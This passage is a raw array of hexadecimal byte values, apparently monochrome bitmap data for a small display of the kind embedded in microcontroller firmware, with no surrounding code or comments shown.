0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X80,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFC,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X7F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,
0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X00,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X7F,0X80,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X03,0XFF,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X01,0XFF,0XF0,0X00,0X00,0XFF,0XFF,0XFF,0XF0,0X00,0X03,0XFE,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
